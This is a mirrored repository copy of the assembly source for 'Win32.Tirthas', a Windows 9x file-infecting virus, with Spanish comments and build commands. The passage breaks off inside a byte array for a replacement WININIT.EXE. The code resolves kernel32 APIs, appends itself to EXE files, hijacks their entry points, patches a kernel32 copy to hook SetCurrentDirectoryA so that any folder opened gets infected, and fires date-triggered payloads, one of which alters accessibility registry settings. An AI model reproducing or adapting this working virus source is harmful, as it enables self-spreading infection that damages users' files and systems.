mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-18 17:36:11 +00:00
1760 lines
52 KiB
NASM
1760 lines
52 KiB
NASM
|
|
;============================================================================
|
|
;
|
|
; WIN32.TIRTHAS - WRITTEN BY KENERMAM
|
|
; (c)2001-02 SPAIN.
|
|
;
|
|
;
|
|
;============================================================================
|
|
;
|
|
; DESCRIPCION
|
|
; ===========
|
|
;
|
|
;Especimen dise¤ado para WIN 95/98/ME que infecta el kernel32.dll creando
|
|
;una nueva seccion llamada .Tirthas. Los archivos los infecta aumentado
|
|
;la ultima seccion. Tiene tres payload quedando seleccionado uno en cada
|
|
;infeccion.
|
|
;
|
|
;
|
|
; FUNCIONAMIENTO
|
|
; ==============
|
|
;
|
|
;Los pasos del virus al ser ejecudado son:
|
|
;
|
|
; 1 - Obtencion de la direccion base del KERNEL.
|
|
; 2 - Obtiene el ordinal de la funcion SetCurrentDirectoryA.
|
|
; 3 - Obtiene la direccion de la funcion GetProcAddress.
|
|
; 4 - Obtiene las direcciones de las funciones necesarias.
|
|
; 5 - Test de la fecha del sistema.
|
|
; 6 - Busqueda de archivos.
|
|
; 7 - Infeccion de archivos.
|
|
; 8 - Comprueba si el kernel esta infectado.
|
|
; 9 - Si el kernel no esta infectado:
|
|
; 10 - Busca el directorio WINDOWS y SYSTEM.
|
|
; 11 - Comprueba si existe KERNEL32.DL_ si no esta lo crea.
|
|
; 12 - Modifica kernel32.dl_
|
|
; 13 - Crea WINSYSTEM.KER
|
|
; 14 - Crea WININIT.INI
|
|
;
|
|
;
|
|
; DETALLES
|
|
; ========
|
|
;
|
|
;La infeccion de archivos se realiza mediante el aumento de la ultima seccion
|
|
;del archivo.
|
|
;La infeccion del kernel se realiza mediante la modificacion del archivo
|
|
;WININIT.EXE el cual es cargado antes que el kernel y por tanto se puede
|
|
;cambiar el mismo desde esta situacion. El cambio del kernel32 se realiza
|
|
;sustituyendo el archivo KERNEL32.DLL por el kernel modificado por el virus
|
|
;situado en un archivo llamado KERNEL32.DL_.Este nuevo nucleo tiene
|
|
;interceptada la funcion SetCurrentDirectoryA. Cuando desde un sistema
|
|
;infectado es llamada esta funcion (cualquier programa llama a esta funcion
|
|
;cuando pulsas sobre una carpeta o escribes un directorio) el virus busca en
|
|
;el directorio los archivos EXE existentes y los infecta.
|
|
;Para infectar kernel32.dl_ (copia de kernel32.dll) busca la ultima seccion
|
|
;y tras esta crea una nueva seccion llamada .Tirthas en la cual se introduce
|
|
;el virus. Despues de esto comienza la busqueda de la seccion de
|
|
;exportaciones para cambiar la RVA de la funcion SetCurrentDirectoryA por
|
|
;otra que apunta a la funcion SetCurrentDirectoryA del virus. Cuando
|
|
;cualquier proceso llama a esta funcion el virus comienza a actuar buscando e
|
|
;infectando los archivos existentes de la carpeta seleccionada
|
|
;
|
|
;
|
|
; PAYLOAD
|
|
; =======
|
|
;
|
|
;Tirthas cuenta con tres payload, de los cuales solo se activara uno en cada
|
|
;archivo infectado.
|
|
;
|
|
; 1 - Payload: Muestra un mensaje de texto:
|
|
;
|
|
; ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
|
|
; ³WIN32.TIRTHAS WRITTEN BY KENERMAM. (c)2001-02 SPAIN ³
|
|
; ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
|
|
; ³ KENERMAM MESSAGE: ³
|
|
; ³ ³
|
|
; ³ YOU ARE FOUL. ³
|
|
; ³ THIS IS INFECTION OF TIRTHAS. ³
|
|
; ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
|
|
;
|
|
; 2 - Payload: Rellena la parate izquierda de la pantalla de windows con el
|
|
; texto YOU ARE FOUL.
|
|
;
|
|
; 3 - Payload: Cambia los atributos de accesibilidad de windows.
|
|
;
|
|
;
|
|
; FICHA
|
|
; =====
|
|
;
|
|
; Nombre: WIN32.TIRTHAS
|
|
; Autor: KENERMAM
|
|
; Origen: ESPA¥A
|
|
; Plataforma: WIN 95/98/ME
|
|
; Tama¤o: 12288 bytes
|
|
; Objetivos: ARCHIVOS EXE
|
|
; Residencia en memoria: INFECTA EL ARCHIVO KERNEL32.DLL E INTERCEPTA LA
|
|
; FUNCION SetCurrentDirecoryA
|
|
;
|
|
;
|
|
; COMPILACION
|
|
; ===========
|
|
;
|
|
; Tasm32 /ml /m5 WIN32TIRTHAS.ASM
|
|
; Tlink32 -Tpe -x -aa WIN32TIRTHAS,,, IMPORT32
|
|
; Pewrsec WIN32TIRTHAS.EXE
|
|
;
|
|
;
|
|
;==================================TIRTHAS===================================
|
|
;============================================================================
|
|
|
|
.386p
|
|
.model flat
|
|
|
|
extrn ExitProcess:proc
|
|
|
|
.data
|
|
|
|
db 'WIN32.TIRTHAS'
|
|
|
|
.code
|
|
Tirthas_start label byte
|
|
|
|
Tirthas:
|
|
call DeltaOffset
|
|
|
|
DeltaOffset:
|
|
pop ebp
|
|
sub ebp, offset DeltaOffset
|
|
|
|
;----------------------------------------------------------------------
|
|
;Obtencion de la direccion base del Kernel32 para, posteriormente,
|
|
;calcular la direccion de GetProcAddress.
|
|
;----------------------------------------------------------------------
|
|
|
|
xor edx,edx
|
|
mov esi,dword ptr fs:[edx]
|
|
mov dword ptr [ebp+Old_SEH],esi
|
|
mov eax,offset [ebp+My_SEH]
|
|
mov fs:[edx],eax
|
|
|
|
mov eax,dword ptr ds:[esp]
|
|
and eax,0ffff0000h
|
|
|
|
Find_baseK:
|
|
|
|
sub eax,10000h
|
|
cmp word ptr [eax],'ZM'
|
|
je Put_old_SEH
|
|
|
|
My_SEH: jmp Find_baseK
|
|
|
|
Put_old_SEH:
|
|
|
|
mov esi,dword ptr [ebp+Old_SEH]
|
|
mov dword ptr fs:[edx],esi
|
|
|
|
Search_info:
|
|
|
|
mov dword ptr [ebp+Base_kernel],eax
|
|
mov dword ptr [ebp+Handle_kernel32],eax
|
|
mov edi,dword ptr [eax+3ch]
|
|
add edi,eax ;EDI= cabecera real del PE.
|
|
|
|
mov eax,dword ptr [edi+78h]
|
|
add eax,[ebp+Base_kernel]
|
|
mov dword ptr [ebp+Address_export_table],eax ;tabla de exportaciones.
|
|
|
|
xor ecx,ecx ;contador.
|
|
mov edi,dword ptr [eax+20h]
|
|
add edi,[ebp+Base_kernel]
|
|
mov eax,edi
|
|
xor edi,edi
|
|
|
|
Find_fuction:
|
|
|
|
mov esi,dword ptr [eax]
|
|
add esi,[ebp+Base_kernel]
|
|
|
|
comparativa:
|
|
mov edx,dword ptr [esi]
|
|
|
|
cmp byte ptr [ebp+Flag_funciones],0
|
|
je SetCurrentDirectoryA_F
|
|
|
|
GetProcAddress_F:
|
|
|
|
cmp dword ptr [ebp+T_GetProcAddress+edi],edx
|
|
jnz More_rva
|
|
jmp Resultado
|
|
|
|
SetCurrentDirectoryA_F:
|
|
|
|
cmp dword ptr [ebp+T_SetCurrentDirectoryA+edi],edx
|
|
jnz More_rva
|
|
|
|
Resultado:
|
|
add esi,4h
|
|
add edi,4h
|
|
|
|
cmp byte ptr [ebp+Flag_funciones],0
|
|
je Max_SetCurrentDirectoryA
|
|
|
|
cmp edi,0ch
|
|
je Fuction_ok
|
|
jmp comparativa
|
|
|
|
Max_SetCurrentDirectoryA:
|
|
|
|
cmp edi,10h
|
|
je Fuction_ok
|
|
jmp comparativa
|
|
|
|
More_rva:
|
|
xor edi,edi
|
|
inc ecx
|
|
add eax,4
|
|
jmp Find_fuction
|
|
|
|
Fuction_ok:
|
|
|
|
rol ecx,1
|
|
mov edi,dword ptr [ebp+Address_export_table]
|
|
mov edi,dword ptr [edi+24h]
|
|
add edi,[ebp+Base_kernel]
|
|
add edi,ecx
|
|
movzx esi,word ptr [edi]
|
|
|
|
;----------------------------------------------------------------------
|
|
; GUARDAMOS LOS ORDINALES DE LAS FUNCIONES
|
|
;----------------------------------------------------------------------
|
|
|
|
cmp byte ptr [ebp+Flag_funciones],0
|
|
jne Get_RVA
|
|
|
|
mov dword ptr [ebp+Ordinal_funcion_1],esi
|
|
|
|
|
|
Get_RVA:
|
|
|
|
rol esi,2
|
|
mov edi,dword ptr [ebp+Address_export_table]
|
|
mov edi,dword ptr [edi+1ch]
|
|
add edi,[ebp+Base_kernel]
|
|
add edi,esi
|
|
mov ebx,edi
|
|
mov eax,dword ptr [edi]
|
|
|
|
cmp byte ptr [ebp+Flag_funciones],1
|
|
je Save_GetProcAddress
|
|
|
|
add byte ptr [ebp+Flag_funciones],1
|
|
mov eax,dword ptr [ebp+Base_kernel]
|
|
jmp Search_info
|
|
|
|
Save_GetProcAddress:
|
|
|
|
mov byte ptr [ebp+Flag_funciones],0
|
|
add eax,[ebp+Base_kernel]
|
|
mov dword ptr [ebp+A_GetProcAddress],eax
|
|
|
|
;----------------------------------------------------------------------
|
|
;BUSQUEDA DE DIRECCIONES
|
|
;----------------------------------------------------------------------
|
|
|
|
mov ecx,13h
|
|
lea edi,[ebp+Address_list_1]
|
|
lea esi,[ebp+Fuction_list_1]
|
|
call Get_Address_1
|
|
|
|
lea eax,[ebp+File_ADVAPI32]
|
|
push eax
|
|
call [ebp+A_LoadLibraryA]
|
|
mov dword ptr [ebp+Base_kernel],eax
|
|
|
|
mov ecx,3h
|
|
lea edi,[ebp+Address_list_2]
|
|
lea esi,[ebp+Fuction_list_2]
|
|
call Get_Address_1
|
|
|
|
lea eax,[ebp+File_USER32]
|
|
push eax
|
|
call [ebp+A_LoadLibraryA]
|
|
mov dword ptr [ebp+Base_kernel],eax
|
|
|
|
mov ecx,5h
|
|
lea edi,[ebp+Address_list_3]
|
|
lea esi,[ebp+Fuction_list_3]
|
|
call Get_Address_1
|
|
|
|
lea eax,[ebp+File_GDI32]
|
|
push eax
|
|
call [ebp+A_LoadLibraryA]
|
|
mov dword ptr [ebp+Base_kernel],eax
|
|
|
|
mov ecx,1
|
|
lea edi,[ebp+Address_list_4]
|
|
lea esi,[ebp+Fuction_list_4]
|
|
call Get_Address_1
|
|
|
|
jmp Check_date
|
|
|
|
;----------------------------------------------------------------------
|
|
; Calculo de las RVA's de las nuevas funciones
|
|
;----------------------------------------------------------------------
|
|
;
|
|
; Salida:
|
|
; EAX = RVA de la nueva funcion.
|
|
;----------------------------------------------------------------------
|
|
|
|
calc_RVA:
|
|
|
|
mov eax,[ebp+Virtual_address]
|
|
add eax,SetCurrentDirectoryA_size
|
|
mov dword ptr [ebp+Datos_0],eax ;RVA de SetCurrentDirectoryA
|
|
|
|
ret
|
|
|
|
Datos_0 dd 0
|
|
|
|
;----------------------------------------------------------------------
|
|
;Obtencion de direcciones.
|
|
;----------------------------------------------------------------------
|
|
; Entrada:
|
|
; ECX = Numero de direcciones a obtener.
|
|
; EDI = Puntero a la tabla de direcciones.
|
|
; ESI = Puntero a la tabla de nombres.
|
|
;
|
|
; Salida:
|
|
; Direcciones de las funciones de la tabla de nombres.
|
|
;----------------------------------------------------------------------
|
|
|
|
Get_Address_1:
|
|
|
|
push ecx
|
|
jmp Get_Address
|
|
|
|
Get_Apis:
|
|
|
|
cmp byte ptr [esi],0h
|
|
je Incremento
|
|
inc esi
|
|
jmp Get_Apis
|
|
|
|
Incremento:
|
|
|
|
inc esi
|
|
|
|
Get_Address:
|
|
|
|
push esi
|
|
push dword ptr [ebp+Base_kernel]
|
|
call [ebp+A_GetProcAddress]
|
|
stosd
|
|
pop ecx
|
|
dec ecx
|
|
|
|
cmp ecx,0
|
|
je Quit_find_apis
|
|
|
|
push ecx
|
|
|
|
jmp Get_Apis
|
|
|
|
Quit_find_apis:
|
|
ret
|
|
|
|
;----------------------------------------------------------------------
|
|
; FUNCION FindFirstFileA
|
|
;----------------------------------------------------------------------
|
|
; 0 = Kernel32.dl_
|
|
; 1 = winsystem.ker
|
|
;----------------------------------------------------------------------
|
|
|
|
Fuction_Find_first_file:
|
|
|
|
lea eax,[ebp+Info_file]
|
|
push eax
|
|
|
|
cmp byte ptr [ebp+Flag_fuction_Find_File],0
|
|
jne Is_wininit
|
|
|
|
lea eax,[ebp+Kernel32backup]
|
|
push eax
|
|
jmp Call_find_file
|
|
|
|
Is_wininit:
|
|
|
|
lea eax,[ebp+File_System_addr]
|
|
push eax
|
|
|
|
Call_find_file:
|
|
|
|
call [ebp+A_FindFirstFileA]
|
|
ret
|
|
;----------------------------------------------------------------------
|
|
; GUARDAR REGISTROS
|
|
;----------------------------------------------------------------------
|
|
|
|
Save_register:
|
|
|
|
mov dword ptr [ebp+EAX_seg],eax
|
|
mov dword ptr [ebp+EBX_seg],ebx
|
|
mov dword ptr [ebp+ECX_seg],ecx
|
|
mov dword ptr [ebp+EDX_seg],edx
|
|
mov dword ptr [ebp+ESI_seg],esi
|
|
mov dword ptr [ebp+EDI_seg],edi
|
|
|
|
ret
|
|
|
|
;----------------------------------------------------------------------
|
|
; RESTAURAR REGISTROS
|
|
;----------------------------------------------------------------------
|
|
|
|
Old_register:
|
|
|
|
mov eax,dword ptr [ebp+EAX_seg]
|
|
mov ebx,dword ptr [ebp+EBX_seg]
|
|
mov ecx,dword ptr [ebp+ECX_seg]
|
|
mov edx,dword ptr [ebp+EDX_seg]
|
|
mov esi,dword ptr [ebp+ESI_seg]
|
|
mov edi,dword ptr [ebp+EDI_seg]
|
|
|
|
ret
|
|
|
|
;//////////////////////////////////////////////////////////////////////
|
|
;/////////////////////// Control del KERNEL ///////////////////////////
|
|
;//////////////////////////////////////////////////////////////////////
|
|
|
|
;----------------------------------------------------------------------
|
|
;----------------------------------------------------------------------
|
|
; Funcion: SetCurrentDirectoryA
|
|
;----------------------------------------------------------------------
|
|
;----------------------------------------------------------------------
|
|
|
|
SetCurrentDirectoryA:
|
|
|
|
push ebp
|
|
call Delta_in_kernel_1
|
|
|
|
Delta_in_kernel_1:
|
|
|
|
pop ebp
|
|
sub ebp,offset Delta_in_kernel_1
|
|
|
|
;----------------------------------------------------------------------
|
|
; GUARDAR REGISTROS
|
|
;----------------------------------------------------------------------
|
|
|
|
call Save_register
|
|
|
|
pop eax
|
|
mov dword ptr [ebp+EBP_seg],eax
|
|
|
|
pop eax
|
|
mov dword ptr [ebp+Return_address],eax
|
|
|
|
;----------------------------------------------------------------------
|
|
; MARCA DE RESIDENCIA
|
|
;----------------------------------------------------------------------
|
|
|
|
call Old_register
|
|
|
|
cmp ecx,7BFh
|
|
jne Search_file_in_directory
|
|
|
|
mov ecx,7C7h
|
|
|
|
call Save_register
|
|
|
|
jmp Pass_control
|
|
|
|
;----------------------------------------------------------------------
|
|
; ACCIONES
|
|
;----------------------------------------------------------------------
|
|
|
|
Search_file_in_directory:
|
|
|
|
call [ebp+A_SetCurrentDirectoryA]
|
|
|
|
call Save_register
|
|
|
|
lea eax,[ebp+Info_file]
|
|
lea ebx,[ebp+Files_exe]
|
|
push eax
|
|
push ebx
|
|
call [ebp+A_FindFirstFileA]
|
|
|
|
inc eax
|
|
je Pass_control
|
|
dec eax
|
|
|
|
mov dword ptr [ebp+Handle_find_files],eax
|
|
|
|
;----------------------------------------------------------------------
|
|
; ABRIR EL ARCHIVO
|
|
;----------------------------------------------------------------------
|
|
|
|
mov byte ptr [ebp+Flag_infection_by_fuction],1
|
|
|
|
call Open_file
|
|
|
|
mov byte ptr [ebp+Flag_infection_by_fuction],0
|
|
|
|
More_files:
|
|
|
|
lea eax,[ebp+Info_file]
|
|
push eax
|
|
push dword ptr [ebp+Handle_find_files]
|
|
call [ebp+A_FindNextFileA]
|
|
|
|
cmp eax,0
|
|
je Pass_control
|
|
|
|
mov byte ptr [ebp+Flag_infection_by_fuction],1
|
|
|
|
call Open_file
|
|
|
|
mov byte ptr [ebp+Flag_infection_by_fuction],0
|
|
|
|
jmp More_files
|
|
|
|
;----------------------------------------------------------------------
|
|
; PASAR EL CONTROL
|
|
;----------------------------------------------------------------------
|
|
|
|
Pass_control:
|
|
|
|
call Old_register
|
|
|
|
push dword ptr [ebp+Return_address]
|
|
|
|
push dword ptr [ebp+EBP_seg]
|
|
pop ebp
|
|
ret
|
|
|
|
|
|
;//////////////////////////////////////////////////////////////////////
|
|
|
|
;----------------------------------------------------------------------
|
|
; TESTEO DE LA FECHA DEL SISTEMA
|
|
;----------------------------------------------------------------------
|
|
|
|
Check_date:
|
|
|
|
lea eax,[ebp+date_system]
|
|
push eax
|
|
call [ebp+A_GetSystemTime]
|
|
|
|
mov ax,word ptr [ebp+Day]
|
|
mov bx,word ptr [ebp+Month]
|
|
|
|
cmp bx,5h
|
|
jne Search_files
|
|
|
|
cmp ax,13h
|
|
jne Search_files
|
|
|
|
;----------------------------------------------------------------------
|
|
; PAYLOAD
|
|
;----------------------------------------------------------------------
|
|
; En cada infeccion hay un numero para activar uno de los tres payload
|
|
; que tiene el virus. El primer payload consiste en mostrar un mensaje
|
|
; con los creditos. El segundo llena el borde izquierdo de la pantalla
|
|
; con el mensaje YOU ARE FOUL. Por ultimo, el tercero, cambia las
|
|
; opciones de accesibilidad del sistema.
|
|
;----------------------------------------------------------------------
|
|
|
|
cmp byte ptr [ebp+Numero_payload],0
|
|
jne Payload_2
|
|
|
|
;----------------------------------------------------------------------
|
|
; PAYLOAD 1
|
|
;----------------------------------------------------------------------
|
|
|
|
lea eax,[ebp+Title_Box_1]
|
|
lea ebx,[ebp+Message_1]
|
|
push 0
|
|
push eax
|
|
push ebx
|
|
push 0
|
|
call [ebp+A_MessageBoxA]
|
|
jmp Search_files
|
|
|
|
Title_Box_1 db " WIN32.TIRTHAS WRITTEN BY KENERMAM. (c)2001-02 SPAIN ",0
|
|
Message_1 db " KENERMAM MESSAGE:",10
|
|
db " YOU ARE FOUL.",10
|
|
db " THIS IS INFECTION OF TIRTHAS.",0
|
|
|
|
;----------------------------------------------------------------------
|
|
; PAYLOAD 2
|
|
;----------------------------------------------------------------------
|
|
|
|
Payload_2:
|
|
|
|
cmp byte ptr [ebp+Numero_payload],2
|
|
jne Payload_3
|
|
|
|
mov eax,dword ptr [ebp+Handle_kernel32]
|
|
mov dword ptr [ebp+HandleInstance],eax
|
|
|
|
lea eax,[ebp+Windows_class]
|
|
push eax
|
|
call [ebp+A_RegisterClassA]
|
|
|
|
push 0
|
|
push dword ptr [ebp+Handle_kernel32]
|
|
push 0
|
|
push 0
|
|
push 0
|
|
push 0
|
|
push 0
|
|
push 0
|
|
push 50000h
|
|
lea eax,[ebp+Title_Windows]
|
|
push eax
|
|
push eax
|
|
push 0
|
|
call [ebp+A_CreateWindowExA]
|
|
|
|
mov dword ptr [ebp+Handle_windows],eax
|
|
mov esi,0ah
|
|
mov ebx,1eh
|
|
|
|
Infinito:
|
|
|
|
push 1
|
|
push dword ptr [ebp+Handle_windows]
|
|
call [ebp+A_ShowWindow]
|
|
|
|
push dword ptr [ebp+Handle_windows]
|
|
call [ebp+A_GetDC]
|
|
|
|
lea edi,[ebp+Texto]
|
|
push 0eh
|
|
push edi
|
|
push esi ;y
|
|
push ebx ;x
|
|
push eax
|
|
call [ebp+A_TextOutA]
|
|
add esi,14h
|
|
jmp Infinito
|
|
|
|
;----------------------------------------------------------------------
|
|
; PAYLOAD 3
|
|
;----------------------------------------------------------------------
|
|
|
|
Payload_3:
|
|
|
|
lea ebx,[ebp+Handle_registro]
|
|
lea eax,[ebp+Clave_Accessibility]
|
|
push ebx
|
|
push 000f003fh
|
|
push eax
|
|
push 80000001h ;Identificacion
|
|
call [ebp+A_RegOpenKeyExA]
|
|
|
|
lea ebx,[ebp+Valor]
|
|
lea eax,[ebp+Nombre_clave]
|
|
|
|
push 1
|
|
push ebx
|
|
push 1
|
|
push 0
|
|
push eax
|
|
push dword ptr [ebp+Handle_registro]
|
|
call [ebp+A_RegSetValueExA]
|
|
|
|
push dword ptr [ebp+Handle_registro]
|
|
call [ebp+A_RegCloseKey]
|
|
|
|
;----------------------------------------------------------------------
|
|
; BUSQUEDA DE ARCHIVOS
|
|
;----------------------------------------------------------------------
|
|
|
|
Search_files:
|
|
|
|
lea eax,[ebp+Info_file]
|
|
lea ebx,[ebp+Files_exe]
|
|
push eax
|
|
push ebx
|
|
call [ebp+A_FindFirstFileA]
|
|
|
|
inc eax
|
|
jz Test_KERNEL
|
|
dec eax
|
|
|
|
mov dword ptr [ebp+Handle_find_files],eax
|
|
jmp Open_file
|
|
|
|
Next_files:
|
|
|
|
lea eax,[ebp+Info_file]
|
|
push eax
|
|
push dword ptr [ebp+Handle_find_files]
|
|
call [ebp+A_FindNextFileA]
|
|
|
|
cmp eax,0
|
|
je Test_KERNEL
|
|
|
|
;----------------------------------------------------------------------
|
|
; ABRE Y MAPEA EL ARCHIVO
|
|
;----------------------------------------------------------------------
|
|
|
|
Open_file:
|
|
|
|
cmp byte ptr [ebp+Flag_infection_by_fuction],1
|
|
jne Standar_open
|
|
|
|
pop eax
|
|
mov dword ptr [ebp+Return_address_in_virus],eax
|
|
|
|
Standar_open:
|
|
|
|
lea eax,[ebp+FileName]
|
|
|
|
push 0
|
|
push 0
|
|
push 3
|
|
push 0
|
|
push 1
|
|
push 0c0000000h ;lectura/escritura.
|
|
push eax
|
|
call [ebp+A_CreateFileA]
|
|
|
|
inc eax
|
|
jz Next_step_1
|
|
dec eax
|
|
|
|
mov dword ptr [ebp+Handle_createfile],eax
|
|
|
|
push 0
|
|
push dword ptr [ebp+FSizeL]
|
|
push 0
|
|
push 4
|
|
push 0
|
|
push eax
|
|
call [ebp+A_CreateFileMappingA]
|
|
|
|
cmp eax,0
|
|
jz Close_file
|
|
|
|
mov dword ptr [ebp+Handle_createfilemap],eax
|
|
|
|
push dword ptr [ebp+FSizeL]
|
|
push 0
|
|
push 0
|
|
push 2 ;escritura.
|
|
push eax
|
|
call [ebp+A_MapViewOfFile]
|
|
|
|
cmp eax,0
|
|
jz Close_filemapping
|
|
|
|
mov dword ptr [ebp+Base_fichero],eax
|
|
|
|
cmp byte ptr [ebp+Flag_open_kernel],1
|
|
je Header_kernel
|
|
|
|
cmp word ptr [eax],'ZM'
|
|
jnz Close_mapping
|
|
|
|
mov esi,dword ptr [eax+3ch]
|
|
add esi,eax ;PE-header.
|
|
|
|
mov dword ptr [ebp+Address_PEheader],esi
|
|
|
|
mov edi,dword ptr [esi+34h]
|
|
mov dword ptr [ebp+Image_base],edi
|
|
cmp word ptr [esi],'EP' ;Marca de los PE.
|
|
jnz Close_mapping
|
|
|
|
|
|
mov ax,word ptr [esi+14h]
|
|
|
|
cmp ax,0
|
|
je Close_mapping
|
|
|
|
mov ax,word ptr [esi+16h]
|
|
and ax,0002h ;Caracteristicas
|
|
jz Close_mapping
|
|
|
|
;----------------------------------------------------------------------
|
|
; COMPROBAR LA MARCA DE INFECCION
|
|
;----------------------------------------------------------------------
|
|
|
|
mov eax,dword ptr [esi+4ch]
|
|
|
|
cmp eax,'seem'
|
|
je Close_mapping
|
|
|
|
cmp byte ptr [ebp+Flag_numero],0
|
|
jne Change_realiced
|
|
|
|
mov ecx,Tirthas_size
|
|
add ecx,1000h ;Espacio para trabajo
|
|
add [ebp+FSizeL],ecx
|
|
or byte ptr [ebp+Flag_numero],1
|
|
|
|
jmp Close_mapping
|
|
|
|
Change_realiced:
|
|
|
|
mov [ebp+Flag_numero],0
|
|
mov [esi+4ch],'seem' ;Marca de infeccion
|
|
|
|
movzx eax,word ptr [esi+6h] ;Numero de secciones.
|
|
mov ebx,esi
|
|
dec eax
|
|
mov edi,28h ;Tama¤o de la cabecera de
|
|
mul edi ;la seccion.
|
|
add esi,78h
|
|
add esi,eax
|
|
mov edi,dword ptr [ebx+74h]
|
|
rol edi,3
|
|
add esi,edi
|
|
mov dword ptr [ebp+Address_Last_section],esi
|
|
|
|
;----------------------------------------------------------------------
|
|
; CARACTERISTICAS DE LA SECCION
|
|
;----------------------------------------------------------------------
|
|
|
|
mov eax,dword ptr [esi+24h]
|
|
or eax,0c0000000h
|
|
mov dword ptr [esi+24h],eax
|
|
|
|
;modificando la seccion.
|
|
|
|
mov eax,dword ptr [esi+0ch]
|
|
mov dword ptr [ebp+Virtual_address_LS],eax
|
|
mov eax,dword ptr [esi+14h]
|
|
mov dword ptr [ebp+Pointer_to_raw_data_LS],eax
|
|
mov eax,dword ptr [esi+8h]
|
|
mov dword ptr [ebp+Virtual_size_LS],eax
|
|
|
|
add eax,Tirthas_size
|
|
add eax,1000h
|
|
mov dword ptr [esi+8h],eax ;Nuevo Virtual size.
|
|
|
|
push eax
|
|
mov eax,dword ptr [ebp+Address_PEheader]
|
|
mov edi,dword ptr [eax+38h]
|
|
mov dword ptr [ebp+Section_alignment],edi
|
|
mov edi,dword ptr [eax+3ch] ;EDI= File alignment.
|
|
pop eax
|
|
xor edx,edx
|
|
div edi
|
|
inc eax
|
|
mul edi
|
|
mov dword ptr [esi+10h],eax ;Nuevo Size Of Raw Data.
|
|
|
|
mov edi,dword ptr [ebp+Address_PEheader]
|
|
|
|
mov ecx,Tirthas_size
|
|
add ecx,1000h
|
|
|
|
mov eax,dword ptr [edi+50h]
|
|
add eax,ecx
|
|
xor edx,edx
|
|
mov ebx,dword ptr [ebp+Section_alignment]
|
|
div ebx
|
|
inc eax
|
|
mul ebx
|
|
|
|
mov dword ptr [edi+50h],eax ;Nuevo Size of Image.
|
|
|
|
;----------------------------------------------------------------------
|
|
; NUEVO ENTRY POINT
|
|
;----------------------------------------------------------------------
|
|
|
|
mov esi,dword ptr [ebp+Virtual_address_LS] ;rva...
|
|
mov eax,dword ptr [ebp+Virtual_size_LS]
|
|
add esi,eax ;ESI= Entry Point
|
|
mov dword ptr [ebp+New_entry_point],esi
|
|
mov eax,dword ptr [ebp+Address_PEheader]
|
|
mov edi,dword ptr [eax+28h]
|
|
mov dword ptr [ebp+Old_entry_point],edi
|
|
mov dword ptr [eax+28h],esi
|
|
|
|
;----------------------------------------------------------------------
|
|
; SELECCION DE PAYLOAD
|
|
;----------------------------------------------------------------------
|
|
|
|
cmp byte ptr [ebp+Numero_payload],2
|
|
jne Meter_inc
|
|
|
|
mov byte ptr [ebp+Numero_payload],0
|
|
jmp Infection_file
|
|
|
|
Meter_inc:
|
|
|
|
add byte ptr [ebp+Numero_payload],1
|
|
|
|
;----------------------------------------------------------------------
|
|
; INFECCION DEL ARCHIVO
|
|
;----------------------------------------------------------------------
|
|
|
|
Infection_file:
|
|
|
|
mov ecx,Tirthas_size
|
|
mov edi,dword ptr [ebp+Pointer_to_raw_data_LS]
|
|
add edi,dword ptr [ebp+Virtual_size_LS]
|
|
add edi,dword ptr [ebp+Base_fichero]
|
|
lea esi,[ebp+offset Tirthas_start]
|
|
rep movsb
|
|
|
|
;----------------------------------------------------------------------
|
|
; CIERRE DEL ARCHIVO INFECTADO
|
|
;----------------------------------------------------------------------
|
|
|
|
Close_mapping:
|
|
|
|
mov eax,dword ptr [ebp+Base_fichero]
|
|
push eax
|
|
call [ebp+A_UnmapViewOfFile]
|
|
|
|
Close_filemapping:
|
|
|
|
mov eax,dword ptr [ebp+Handle_createfilemap]
|
|
push eax
|
|
call [ebp+A_CloseHandle]
|
|
|
|
Close_file:
|
|
|
|
mov eax,dword ptr [ebp+Handle_createfile]
|
|
push eax
|
|
call [ebp+A_CloseHandle]
|
|
|
|
cmp byte ptr [ebp+Flag_open_kernel],1
|
|
je New_Wininit
|
|
|
|
cmp byte ptr [ebp+Flag_numero],1
|
|
je Standar_open
|
|
|
|
cmp byte ptr [ebp+Flag_infection_by_fuction],1
|
|
je Return_to_fuction
|
|
|
|
jmp Next_files
|
|
|
|
Next_step:
|
|
|
|
cmp byte ptr [ebp+Flag_open_kernel],1
|
|
je New_Wininit
|
|
jmp Next_files
|
|
|
|
Next_step_1:
|
|
|
|
cmp byte ptr [ebp+Flag_infection_by_fuction],1
|
|
jne Next_step
|
|
|
|
Return_to_fuction:
|
|
|
|
push dword ptr [ebp+Return_address_in_virus]
|
|
ret
|
|
|
|
;----------------------------------------------------------------------
|
|
; NUEVO WININIT.EXE
|
|
;----------------------------------------------------------------------
|
|
; Se encarga de eliminar el kernel32.dll antes de ser cargado.
|
|
;----------------------------------------------------------------------
|
|
|
|
New_wininit_start label byte
|
|
|
|
db 4dh,5ah,59h,1h,2h,0,1h,0
|
|
db 20h,0,0,0,0ffh,0ffh,0,0
|
|
db 80h,0,0,0,0,0,11h,0
|
|
db 3eh,0,0,0,1h,0,0fbh,71h
|
|
db 6ah,72h,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,1h,0
|
|
db 11h,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
db 0,0,0,0,0,0,0,0
|
|
